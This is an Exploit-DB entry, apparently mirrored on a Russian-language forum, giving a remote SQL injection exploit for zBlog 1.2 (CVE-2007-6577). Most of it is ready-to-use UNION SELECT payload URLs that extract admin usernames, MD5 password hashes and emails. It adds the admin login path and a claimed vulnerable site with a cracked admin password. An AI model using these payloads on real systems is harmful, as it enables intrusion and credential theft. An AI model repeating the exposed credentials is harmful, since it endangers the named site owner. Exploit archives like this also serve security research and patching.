- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4772
- Проверка EDB
-
- Пройдено
- Автор
- HOUSSAMIX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-6577
- Дата публикации
- 2007-12-22
Код:
#########################################################################
zBlog v1.2 Remote SQL Injection Exploit
#########################################################################
## AUTHOR : H-T Team ( HouSSamix _ ToXiC350 _ CoNaN )
## HOME : http://no-hack.net
## Script : zBlog
## Version : 1.2
## Site : http://kaxz01.free.fr/
## Download : http://kaxz01.free.fr/fichiers/zBlog.zip
## EXPLOITS :
[1]
http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--
[2]
http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--
[table prefix] = by default it is zblog
ex : http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins--
## Note
admin login is at /admin/
## GREETZ : RoMaNcYxHaCkEr , Mahmood_Ali , C_m and all musulmans hackers
#########################################################################
zBlog v1.2 Remote SQL Injection Exploit
#########################################################################
exemple of site vulnerable
http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--
account admin with password md5 cracked
user >> Selim
pass >> 6a81060b83b919bc115112bf840eca63 = miles
# milw0rm.com [2007-12-22]- Источник
- www.exploit-db.com
